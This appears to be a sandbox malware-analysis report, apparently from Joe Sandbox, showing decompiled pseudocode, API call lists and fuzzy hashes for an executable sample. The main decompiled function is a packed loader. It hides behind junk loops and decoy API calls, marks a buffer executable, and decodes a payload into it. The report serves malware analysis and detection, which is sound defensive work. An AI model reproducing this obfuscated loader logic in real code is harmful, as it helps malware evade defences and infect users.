			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t11;
				intOrPtr* _t17;
				void* _t19;
				void* _t22;

				_t23 = __eflags;
				asm("out 0x95, eax");
				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, __edi); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

0x00401822
0x00401822
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x00401899
0x0040189e
0x0040189f
0x004018a0
0x004018a1
0x004018a1
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000A.00000002.394197178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401826 Relevance: 3.0, APIs: 2, Instructions: 40
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t8;
				void* _t11;
				intOrPtr* _t17;
				void* _t19;
				void* _t22;

				_t23 = __eflags;
				asm("sbb ebx, ebp");
				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L00401455(0x60, _t19, __edi); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_t17 = _t17 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

0x00401826
0x00401826
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x00401899
0x0040189e
0x0040189f
0x004018a0
0x004018a1
0x004018a1
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000A.00000002.394197178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401834 Relevance: 3.0, APIs: 2, Instructions: 39
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t10;
				void* _t13;
				intOrPtr* _t19;
				void* _t22;
				void* _t25;

				_t26 = __eflags;
				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
				_t19 =  *((intOrPtr*)(_t25 + 8));
				Sleep(0x1388);
				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
				if(_t13 != 0) {
					_push( *((intOrPtr*)(_t25 + 0x14)));
					_push( *((intOrPtr*)(_t25 - 4)));
					_push(_t13);
					_push(_t19); // executed
					L00401455(0x60, _t22, __edi); // executed
				}
				 *_t19(0xffffffff, 0); // executed
				_t19 = _t19 + 0x60;
				_push(0x60);
				asm("pushad");
				__ecx =  *__esp;
				__esp = __esp + 4;
				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
				_pop(__edi);
				_pop(__esi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}

0x00401834
0x00401839
0x0040183e
0x00401846
0x00401854
0x0040185b
0x0040185d
0x00401860
0x00401863
0x00401864
0x00401865
0x00401865
0x0040186e
0x0040187a
0x0040188a
0x0040188b
0x0040188c
0x0040188f
0x00401899
0x0040189e
0x0040189f
0x004018a0
0x004018a1
0x004018a1
0x004018a2

APIs

Sleep.KERNELBASE(00001388), ref: 00401846
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E

Memory Dump Source

Source File: 0000000A.00000002.394197178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: sifdvgfPID: 2368, Parent PID: 1080COMMON

Executed Functions

Function 00405A6B Relevance: 81.0, APIs: 32, Strings: 14, Instructions: 514
memorycomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E00405A6B(void* __fp0) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t596;
				long _t600;
				void* _t603;
				struct HINSTANCE__* _t608;
				intOrPtr _t613;
				intOrPtr* _t623;
				intOrPtr* _t643;
				intOrPtr* _t645;
				intOrPtr* _t648;
				void* _t783;
				void* _t785;
				void* _t788;
				void* _t797;
				signed int _t799;
				long _t800;
				void* _t845;
				void* _t848;
				void* _t849;
				void* _t850;
				intOrPtr* _t855;
				void* _t857;
				intOrPtr* _t858;
				long _t869;
				void* _t871;
				void* _t883;

				_t883 = __fp0;
				_t858 = _t857 - 0x74;
				E00407168(E004176DE, _t855);
				E00406B10(0x1708);
				 *0x42e648 =  *0x41b80c; // executed
				_t596 = GlobalAlloc(0,  *0x42e644); // executed
				 *0x42dc24 = _t596;
				VirtualProtect(_t596,  *0x42e644, 0x40, _t855 + 0x70); // executed
				_t845 = 0;
				while(1) {
					GetLastError();
					if(_t845 < 0x129adee) {
						 *((intOrPtr*)(_t855 + 0x48)) = 0x16b700e0;
						 *((intOrPtr*)(_t855 - 0xa4)) = 0x729fb588;
						 *((intOrPtr*)(_t855 + 0x34)) = 0x77dc540a;
						 *((intOrPtr*)(_t855 + 0x68)) = 0x3cce353c;
						 *((intOrPtr*)(_t855 + 0x10)) = 0x7e9bacb0;
						 *((intOrPtr*)(_t855 - 0x9c)) = 0x1db2bd3d;
						 *((intOrPtr*)(_t855 - 0x84)) = 0x20627d21;
						 *((intOrPtr*)(_t855 - 0x1c)) = 0x3f6ac131;
						 *((intOrPtr*)(_t855 - 0x58)) = 0x4429947a;
						 *((intOrPtr*)(_t855 - 0x18)) = 0x5a1efe77;
						 *((intOrPtr*)(_t855 - 0x48)) = 0x4f98a507;
						 *((intOrPtr*)(_t855 - 0x10)) = 0x132dd8ea;
						 *((intOrPtr*)(_t855 - 0x68)) = 0x3c255f10;
						 *((intOrPtr*)(_t855 + 0x3c)) = 0x36416eaf;
						 *((intOrPtr*)(_t855 - 0x8c)) = 0xe14f715;
						 *((intOrPtr*)(_t855 - 0x6c)) = 0x7d5c34bd;
						 *((intOrPtr*)(_t855 + 0x44)) = 0x28df196a;
						 *((intOrPtr*)(_t855 + 0x18)) = 0x37dcb12c;
						 *((intOrPtr*)(_t855 - 0x3c)) = 0x72fc7d09;
						 *((intOrPtr*)(_t855 + 0x60)) = 0x5147c96c;
						 *(_t855 - 0x90) = 0x704b32f3;
						 *((intOrPtr*)(_t855 + 0x38)) = 0x5f8f1819;
						 *((intOrPtr*)(_t855 + 0x50)) = 0x27a76e55;
						 *((intOrPtr*)(_t855 - 0x40)) = 0x22fa090;
						 *((intOrPtr*)(_t855 - 0x38)) = 0x670e8118;
						 *((intOrPtr*)(_t855 + 4)) = 0xe01cd9b;
						 *((intOrPtr*)(_t855 - 0x30)) = 0x3c082c18;
						 *((intOrPtr*)(_t855 - 0xa8)) = 0x3ecf8779;
						 *(_t855 + 0x6c) = 0x3686b744;
						 *((intOrPtr*)(_t855 - 0x28)) = 0x38c96a6e;
						 *((intOrPtr*)(_t855 + 8)) = 0x1dd9dcf9;
						 *((intOrPtr*)(_t855 + 0xc)) = 0x3f99f2e3;
						 *((intOrPtr*)(_t855 - 0x98)) = 0x76152ab6;
						 *((intOrPtr*)(_t855 - 0x44)) = 0x35d35e74;
						 *((intOrPtr*)(_t855 - 0x74)) = 0x7f54c16b;
						 *((intOrPtr*)(_t855 + 0x14)) = 0x3ed4b651;
						 *((intOrPtr*)(_t855 + 0x28)) = 0x626e8506;
						 *((intOrPtr*)(_t855 - 0x2c)) = 0x5edd1c6f;
						 *((intOrPtr*)(_t855 - 0x5c)) = 0x7467e854;
						 *((intOrPtr*)(_t855 + 0x40)) = 0x678283b1;
						 *((intOrPtr*)(_t855 + 0x1c)) = 0x7774bd03;
						 *((intOrPtr*)(_t855 + 0x4c)) = 0x34eec2c0;
						 *((intOrPtr*)(_t855 + 0x58)) = 0x23ee5613;
						 *((intOrPtr*)(_t855 - 0xa0)) = 0x7710f6f;
						 *((intOrPtr*)(_t855 - 0x54)) = 0x4aa513f0;
						 *((intOrPtr*)(_t855 - 0x14)) = 0x14c03604;
						 *((intOrPtr*)(_t855 - 0x50)) = 0x709d39b2;
						 *((intOrPtr*)(_t855 - 0x88)) = 0x2d9fc390;
						 *((intOrPtr*)(_t855 - 0x4c)) = 0xdc26664;
						 *((intOrPtr*)(_t855 - 0x60)) = 0xef0aa3c;
						 *((intOrPtr*)(_t855 - 0x7c)) = 0x59d10e2f;
						 *((intOrPtr*)(_t855 - 0x80)) = 0xdb5b201;
						 *((intOrPtr*)(_t855 - 0x64)) = 0x3d00c619;
						 *((intOrPtr*)(_t855 - 0x34)) = 0x2ee3cb51;
						 *((intOrPtr*)(_t855 - 0x78)) = 0x5c1ad1e2;
						 *((intOrPtr*)(_t855 + 0x74)) = 0x6d5a82ad;
						 *((intOrPtr*)(_t855 + 0x24)) = 0x6415b55c;
						 *((intOrPtr*)(_t855 + 0x20)) = 0x43086827;
						 *((intOrPtr*)(_t855 + 0x54)) = 0x42d3b3fd;
						 *((intOrPtr*)(_t855 + 0x2c)) = 0x8ebf9f3;
						 *((intOrPtr*)(_t855 + 0x64)) = 0x3289be56;
						 *((intOrPtr*)(_t855 - 0x20)) = 0x198f9d06;
						 *((intOrPtr*)(_t855 - 0x24)) = 0x51e34c97;
						 *_t855 = 0x3238d997;
						 *((intOrPtr*)(_t855 + 0x5c)) = 0x2afa9fe6;
						 *((intOrPtr*)(_t855 + 0x30)) = 0x274f0a8c;
						 *((intOrPtr*)(_t855 - 0x70)) = 0x5900053b;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x4a11786;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) + 0x4560716b;
						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) - 0x72fd1c75;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x2a2e8e8;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x1e649d84;
						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) - 0x1adfd311;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x3f0a0b7;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x31fc1696;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x5e14f9c9;
						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0xd42e0;
						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) - 0x3c18d7b7;
						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) - 0x2002a17a;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) + 0x66fa3a6b;
						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) + 0x7644be02;
						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) - 0x38077f3b;
						 *((intOrPtr*)(_t855 - 0x84)) =  *((intOrPtr*)(_t855 - 0x84)) + 0x6861ed43;
						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) + 0x2149ea17;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x42dd5e39;
						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0x3fde49f0;
						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) + 0x24c6ffa8;
						 *((intOrPtr*)(_t855 - 0x84)) =  *((intOrPtr*)(_t855 - 0x84)) + 0x1057b77;
						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) - 0x49b1f22e;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) + 0x53f6c871;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x31e78741;
						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) + 0x3718ba5b;
						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) - 0x459675f0;
						 *((intOrPtr*)(_t855 - 0x18)) =  *((intOrPtr*)(_t855 - 0x18)) - 0x39fd0a2;
						 *((intOrPtr*)(_t855 - 0x48)) =  *((intOrPtr*)(_t855 - 0x48)) + 0x727a9530;
						 *((intOrPtr*)(_t855 - 0x48)) =  *((intOrPtr*)(_t855 - 0x48)) - 0x56301dce;
						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) - 0x485ad839;
						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) - 0x6f733afe;
						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) - 0x1acbf0c0;
						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) + 0x6bbfcb99;
						 *((intOrPtr*)(_t855 - 0x8c)) =  *((intOrPtr*)(_t855 - 0x8c)) + 0x6a615b6a;
						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0x403e4fb5;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x5ec62208;
						 *((intOrPtr*)(_t855 - 0x68)) =  *((intOrPtr*)(_t855 - 0x68)) + 0x39bcf23a;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x746a7ea9;
						 *((intOrPtr*)(_t855 - 0x68)) =  *((intOrPtr*)(_t855 - 0x68)) + 0x1b651608;
						 *((intOrPtr*)(_t855 + 0x3c)) =  *((intOrPtr*)(_t855 + 0x3c)) + 0x524f99ee;
						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) - 0x76b5296;
						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) - 0x1ca732cc;
						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) + 0x4a0bd545;
						 *((intOrPtr*)(_t855 + 0x18)) =  *((intOrPtr*)(_t855 + 0x18)) - 0x249dac94;
						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) - 0x6fb1faa3;
						 *((intOrPtr*)(_t855 + 0x50)) =  *((intOrPtr*)(_t855 + 0x50)) - 0x50ecbeb8;
						 *(_t855 - 0x90) =  *(_t855 - 0x90) + 0x4d7e5689;
						 *((intOrPtr*)(_t855 - 0x68)) =  *((intOrPtr*)(_t855 - 0x68)) + 0x591a883a;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) + 0x78fc8c1e;
						 *((intOrPtr*)(_t855 - 0x8c)) =  *((intOrPtr*)(_t855 - 0x8c)) - 0x3ecbf404;
						 *((intOrPtr*)(_t855 + 4)) =  *((intOrPtr*)(_t855 + 4)) - 0x6fe1682;
						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) + 0x9e116c0;
						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) + 0x42f97163;
						 *((intOrPtr*)(_t855 + 0x3c)) =  *((intOrPtr*)(_t855 + 0x3c)) - 0x7593f15b;
						 *((intOrPtr*)(_t855 - 0x84)) =  *((intOrPtr*)(_t855 - 0x84)) + 0x7eef95db;
						 *((intOrPtr*)(_t855 + 0x50)) =  *((intOrPtr*)(_t855 + 0x50)) + 0x6c82abb3;
						 *((intOrPtr*)(_t855 + 0x50)) =  *((intOrPtr*)(_t855 + 0x50)) - 0x6508f030;
						 *((intOrPtr*)(_t855 - 0x98)) =  *((intOrPtr*)(_t855 - 0x98)) - 0x1c707926;
						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) - 0x21ba796a;
						 *((intOrPtr*)(_t855 + 0x44)) =  *((intOrPtr*)(_t855 + 0x44)) - 0x495bf23b;
						 *((intOrPtr*)(_t855 + 0x18)) =  *((intOrPtr*)(_t855 + 0x18)) + 0x4af4edd1;
						 *((intOrPtr*)(_t855 + 0x3c)) =  *((intOrPtr*)(_t855 + 0x3c)) + 0x5367e117;
						 *((intOrPtr*)(_t855 - 0x98)) =  *((intOrPtr*)(_t855 - 0x98)) + 0x300e1081;
						 *((intOrPtr*)(_t855 + 8)) =  *((intOrPtr*)(_t855 + 8)) + 0x32361f60;
						 *((intOrPtr*)(_t855 - 0x44)) =  *((intOrPtr*)(_t855 - 0x44)) - 0x70fde692;
						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x103a5e93;
						 *((intOrPtr*)(_t855 - 0x5c)) =  *((intOrPtr*)(_t855 - 0x5c)) + 0x529fcf39;
						 *((intOrPtr*)(_t855 + 0x38)) =  *((intOrPtr*)(_t855 + 0x38)) + 0x7c9f7835;
						 *((intOrPtr*)(_t855 + 0x14)) =  *((intOrPtr*)(_t855 + 0x14)) - 0x708c25b4;
						 *(_t855 - 0x90) =  *(_t855 - 0x90) + 0x36d67e57;
						 *((intOrPtr*)(_t855 + 0xc)) =  *((intOrPtr*)(_t855 + 0xc)) - 0x57fb3c02;
						 *((intOrPtr*)(_t855 + 0x40)) =  *((intOrPtr*)(_t855 + 0x40)) - 0x3f99fb2a;
						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) - 0x74f97a90;
						 *((intOrPtr*)(_t855 - 0x38)) =  *((intOrPtr*)(_t855 - 0x38)) - 0x17ce5752;
						 *((intOrPtr*)(_t855 - 0x4c)) =  *((intOrPtr*)(_t855 - 0x4c)) - 0x4821aa3d;
						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0x3a3f3a40;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x1de8200;
						 *((intOrPtr*)(_t855 - 0x8c)) =  *((intOrPtr*)(_t855 - 0x8c)) + 0x6c325c08;
						 *((intOrPtr*)(_t855 - 0x34)) =  *((intOrPtr*)(_t855 - 0x34)) + 0x60a345da;
						 *((intOrPtr*)(_t855 - 0x5c)) =  *((intOrPtr*)(_t855 - 0x5c)) - 0xc11cad6;
						 *((intOrPtr*)(_t855 - 0x88)) =  *((intOrPtr*)(_t855 - 0x88)) - 0x24391f5c;
						 *((intOrPtr*)(_t855 + 0x44)) =  *((intOrPtr*)(_t855 + 0x44)) - 0x7643ad89;
						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) - 0x21db0587;
						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) + 0x6c6ae23;
						 *((intOrPtr*)(_t855 - 0x80)) =  *((intOrPtr*)(_t855 - 0x80)) - 0x17d6899a;
						 *((intOrPtr*)(_t855 - 0x34)) =  *((intOrPtr*)(_t855 - 0x34)) + 0x4749c337;
						 *((intOrPtr*)(_t855 - 0x4c)) =  *((intOrPtr*)(_t855 - 0x4c)) + 0x4dd6c6ef;
						 *((intOrPtr*)(_t855 + 0x14)) =  *((intOrPtr*)(_t855 + 0x14)) + 0x402e7a02;
						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) + 0x4d6aa82;
						_t799 = 0x74d17c3e *  *(_t855 + 0x6c) >> 0x20;
						__imp__GetProcessHandleCount(0, 0); // executed
					}
					GetSystemDefaultLCID();
					if(_t845 > 0x12a82b5) {
						break;
					}
					_t845 = _t845 + 1;
					if(_t845 < 0x17c462e4) {
						continue;
					}
					break;
				}
				_t865 =  *0x42e644 - 0x16;
				if( *0x42e644 == 0x16) {
					GetVersionExW(0);
					GetComputerNameA(_t855 - 0x4c4, _t855 - 0x90);
					GlobalWire(_t855 - 0xf14);
					ResetEvent(0);
					OpenWaitableTimerA(0, 0, "padumojerupodivufojonabahusemufikeserivifaleb");
					FindNextFileW(0, _t855 - 0x714);
					 *((intOrPtr*)(_t855 - 0xac)) = 0xf;
					E004058A2(_t855 - 0xc4, 0);
					 *(_t855 - 4) = 0;
					E0040753F(_t783, 0, "0.txt", "rb");
					E00407447(0);
					_pop(_t797);
					_t643 = _t858;
					 *_t643 = 0;
					 *((intOrPtr*)(_t643 + 4)) = 0;
					E0040556F(_t883);
					st0 = _t883;
					_t645 = _t858;
					 *_t645 = 0;
					 *((intOrPtr*)(_t645 + 4)) = 0;
					E0040554C(_t883, _t797, _t797);
					st0 = _t883;
					E004072E8(_t783, _t799, 1, 0, _t865);
					_t648 = _t858;
					 *_t648 = 0;
					 *((intOrPtr*)(_t648 + 4)) = 0;
					E00405529(_t883, _t797, 0);
					st0 = _t883;
					 *(_t855 - 4) =  *(_t855 - 4) | 0xffffffff;
					E004058C7(_t855 - 0xc4, 1, _t855, 1, 0);
				}
				_t867 =  *0x42e644 - 0xc;
				if( *0x42e644 == 0xc) {
					__imp__OleQueryCreateFromData();
					__imp__WinHttpCloseHandle();
					FoldStringW(0, L"miputuwudukabocayuvehom", 0, _t855 - 0xf14, 0);
					E00407447(0);
					E004072A3(0, 0);
					_t623 = _t858;
					 *_t623 = 0;
					 *((intOrPtr*)(_t623 + 4)) = 0;
					E00405529(_t883, 0, 0);
					st0 = _t883;
					_push(0);
					_push(0);
					E00407187(_t783, _t799, 1, 0, _t867);
					E004059C4(_t855 - 0xc0);
					 *(_t855 - 4) = 1;
					E00405931(_t855 - 0x94,  *((intOrPtr*)(_t855 - 0xb4)), _t855 - 0xc0);
					 *(_t855 - 4) =  *(_t855 - 4) | 0xffffffff;
					E00405A3C(_t855 - 0xc0);
				}
				_t848 = 0;
				_t869 =  *0x42e644; // 0xf790
				if(_t869 > 0) {
					do {
						_t613 =  *0x42e648; // 0x36a035
						 *((intOrPtr*)(_t855 + 0x74)) = _t613;
						 *((intOrPtr*)(_t855 + 0x74)) =  *((intOrPtr*)(_t855 + 0x74)) + 0xb2d3b;
						_t788 =  *0x42dc24; // 0x6ef814
						 *((char*)(_t848 + _t788)) =  *((intOrPtr*)( *((intOrPtr*)(_t855 + 0x74)) + _t848));
						if( *0x42e644 == 0x44) {
							__imp__GetLongPathNameA(0, _t855 - 0x4c4, 0);
							CreateMutexA(0, 0, 0);
						}
						_t848 = _t848 + 1;
						_t871 = _t848 -  *0x42e644; // 0xf790
					} while (_t871 < 0);
				}
				_t849 = 0;
				do {
					_t600 =  *0x42e644; // 0xf790
					if(_t600 + _t849 == 0x5e) {
						SetConsoleCtrlHandler(0, 0);
						AddAtomW(L"Nalid cinunec");
						lstrcpynA(_t855 - 0x4c4, 0, 0);
						__imp__SetFileShortNameW(0, L"bawum");
					}
					_t849 = _t849 + 1;
				} while (_t849 < 0x40c893);
				_t800 =  *0x42e644; // 0xf790
				_t785 =  *0x42dc24; // 0x6ef814
				E0040573C(_t785, _t800, 0x419008);
				_t603 = 0;
				do {
					if(_t603 == 0x770e) {
						 *((intOrPtr*)(_t855 + 0x74)) = 0;
						 *((intOrPtr*)(_t855 + 0x74)) =  *((intOrPtr*)(_t855 + 0x74)) + 0x3afc;
						 *0x42dc24 =  *0x42dc24 +  *((intOrPtr*)(_t855 + 0x74));
					}
					_t603 = _t603 + 1;
				} while (_t603 < 0x286b97d);
				_t850 = 0x7b;
				do {
					if( *0x42e644 == 0xd) {
						GetFileType(0);
						FindFirstChangeNotificationW(0, 0, 0);
					}
					if( *0x42e644 == 0xf) {
						__imp__GetConsoleAliasW(0, _t855 - 0x1714, 0, 0);
						GetUserDefaultLangID();
					}
					_t850 = _t850 - 1;
				} while (_t850 != 0);
				_t608 = LoadLibraryA("msimg32.dll");
				 *[fs:0x0] =  *((intOrPtr*)(_t855 - 0xc));
				return _t608;
			}

APIs

__EH_prolog.LIBCMT ref: 00405A74
GlobalAlloc.KERNELBASE(00000000), ref: 00405A98
VirtualProtect.KERNELBASE(00000000,00000040,?), ref: 00405AB0
GetLastError.KERNEL32 ref: 00405AB8
GetProcessHandleCount.KERNELBASE(00000000,00000000,3686B744,274F0A8C,4AF4EDD1,4DD6C6EF,3A3F3A40,708C25B4,59D10E2F,36D67E57,3289BE56,4821AA3D,3A3F3A40,626E8506,626E8506,42D3B3FD), ref: 00406187

Part of subcall function 00405A3C: __EH_prolog.LIBCMT ref: 00405A41

GetSystemDefaultLCID.KERNEL32 ref: 0040618D
GetVersionExW.KERNEL32(00000000), ref: 004061B9
GetComputerNameA.KERNEL32 ref: 004061CD
GlobalWire.KERNEL32 ref: 004061DA
ResetEvent.KERNEL32(00000000), ref: 004061E1
OpenWaitableTimerA.KERNEL32(00000000,00000000,padumojerupodivufojonabahusemufikeserivifaleb), ref: 004061EE
FindNextFileW.KERNEL32(00000000,?), ref: 004061FC
__wfopen_s.LIBCMT ref: 00406226
_feof.LIBCMT ref: 0040622C
_puts.LIBCMT ref: 00406252
OleQueryCreateFromData.OLE32(00000000), ref: 00406281
WinHttpCloseHandle.WINHTTP(00000000), ref: 00406288
FoldStringW.KERNEL32(00000000,miputuwudukabocayuvehom,00000000,?,00000000), ref: 0040629D
_feof.LIBCMT ref: 004062A4
_fsetpos.LIBCMT ref: 004062AB
_fprintf.LIBCMT ref: 004062C1
GetLongPathNameA.KERNEL32 ref: 00406338
